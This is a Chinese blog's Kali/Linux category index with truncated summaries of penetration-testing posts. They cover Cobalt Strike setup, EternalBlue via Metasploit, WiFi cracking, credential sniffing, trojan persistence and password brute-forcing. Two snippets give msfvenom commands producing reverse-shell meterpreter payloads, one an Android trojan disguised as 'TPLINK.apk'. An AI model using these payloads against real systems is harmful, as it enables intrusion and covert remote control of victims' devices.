随笔分类 - KALI/LINUX
摘要:转载地址 :https://mp.weixin.qq.com/s/ftipTYI7zIwlQbeS75k2Yw ping不通是什么原因? 本文为记录,转载地址在文章开头和结尾都有。 一、同网段ping不通的原因 目的ip和源ip是同一网段的,ping的结果是“无法访问目标主机” 目的ip和源ip是同
阅读全文
摘要:CobaltStrike安装 将下载的cs4.0放入kali里(放到挂载共享磁盘中的得移动到kali本机中)。 2. 在CS目录下,输入./teamserver kali的ip 密码(启动服务器) 3. 启动后不要关闭,重新打开CS当前目录的终端,输入chmod 777 teamserver 4.
阅读全文
摘要:忙了一阵子,复现了wxoday,参考多章博客,会在最下面详列出来。 复现微信0day 1.漏洞描述 国外安全研究员发布了Chrome远程代码执行0Day漏洞的POC详情,漏洞为“严重”级别。攻击者利用此漏洞,构造一个恶意的web页面,用户访问该页面时,会造成远程代码执行。大量采用Chrome内核的浏
阅读全文
摘要:准备: kali为攻击机,ip:172.17.2.132 win7为靶机, ip:172.17.2.64 使用msf模块。需要在同一局域网中。 步骤: 1.启动数据库服务 service postgresql start 2.开启msf 3.搜索永恒之蓝 4.使用永恒之蓝ms17-010漏洞 use
阅读全文
摘要:觉得写的不错,故转载:https://mp.weixin.qq.com/s/idoKIGK7-z3SOjMKCflJlg 一,定义 CC(ChallengeCollapsar,挑战黑洞)攻击是DDoS攻击的一种类型,使用代理服务器向受害服务器发送大量貌似合法的请求。CC根据其工具命名,攻击者使用代理
阅读全文
摘要:1|00x00 Payload生成 1|1Windows·Linux Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p l
阅读全文
摘要:转载:https://blog.csdn.net/qq_37688753/article/details/82710215 什么是ARPARP 地址解析协议 将ip地址转换为mac地址 过程: 主机A(路由器或以太网交换机):谁是IP1,你的MAC地址是多少,我的MAC 地址是mac1 主机B :
阅读全文
摘要:转载:http://www.vuln.cn/2674 WIFI破解原理 一直准备找个时间来写个wifi破解教程,因为很多人都想学wifi破解,但是网上的教程都太乱,而且弄来弄错容易错,那是对于wifi破解的原理没有充分的认识,这次准备纯码字给大家通俗的讲解wifi破解,破解工具以aircrack-n
阅读全文
摘要:转载:https://mp.weixin.qq.com/s/cY5d0jw-L6bJhu94inHNEA Wireshark抓取网站用户名和密码 下面通过一个简单的示例讲解Wireshark抓包的基本用法,运行软件如下图所示。 第一步:选择目标网站(http://www.xxxxx.org/Logi
阅读全文
摘要:一、在码云的搜索框中可以直接搜索: 点击任意一个搜索结果,如果发现与要下载的仓库一致,则可以通过码云直接克隆下载: 如果要下载的github项目在码云上不存在,可以先注册一个码云帐号,再将github的项目克隆过来:进入个人中心后找到右上角的+ 号,选择“从Github导入仓库” 输入该仓库的相关信
阅读全文
摘要:如果点击start attrack 后出现 Payload set 1: Invalid number settings 的提示,先点hex 后点 decimal 再开始start attrack,这是一个软件bug,需要手动让它刷新。 转载:https://blog.csdn.net/fjh199
阅读全文
摘要:在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木
阅读全文
摘要:WebCrack简介 WebCrack是一款开源免费的web后台弱口令/万能密码批量爆破、检测工具。 不仅支持如discuz,织梦,phpmyadmin等主流CMS的后台爆破,并且对于绝大多数小众CMS甚至个人开发网站后台都有效果,只需在工具中导入后台地址即可进行自动化检测。 使用方法 下载GitH
阅读全文
摘要:什么是社会工程学 社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,
阅读全文
摘要:python -m pip是什么? 首先,python -m pip会使用您指定为python的Python解释器来执行pip。因此,/usr/bin/python3.7 -m pip表示您正在执行位于/usr/bin/python3.7的解释器的pip。如果您不熟悉这个标志以及它是如何工作的,您可
阅读全文
摘要:临时使用:通用windows和linux可以在使用pip的时候在后面加上-i参数,指定pip源eg: pip install scrapy -i https://pypi.tuna.tsinghua.edu.cn/simple 永久修改:Linux:修改 /root/.pip/pip.conf (没
阅读全文
摘要:普通版 在kali中我们可以利用msfvenom来生成一个Android木马。命令如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk 这样便生成了一个名为TPL
阅读全文
摘要:一:sniper【狙击手】 这种攻击基于原始的请求内容,需要一个字典,每次用字典里的一个值去代替一个待攻击的原始值。 攻击次数=参数个数X字典内元素个数 例如:原始请求中 name=aa , password=bb, 字典: { 1 ,2 }; 那么会产生四个请求: name=1 , passwor
阅读全文
摘要:网站基本信息收集 网站域名、子域名收集 域名解析ip查询 网站所有人(whois) 负责人联系方式 网站基于那个CMS搭建 1x01 网站域名子域名收集 这里,我们以本站一级域名bbskali.cn为例,简单看看网站子域名信息的收集。这里介绍几个kali中自带的子域名查询工具。利用dnsmap查询子
阅读全文
摘要:BurpSuite 是我心中最强大的Web渗透工具,没有之一!它也是日常中用得最多的工具,它有一些强大的插件可以帮忙我们减少大量的工作量以及更好地挖掘漏洞,今天分享下我常用的一些 burp 插件。 Autorize —— 强大的越权自动化测试工具 如果你在测试越权的时候,还是手动把URL复制到另一个
阅读全文
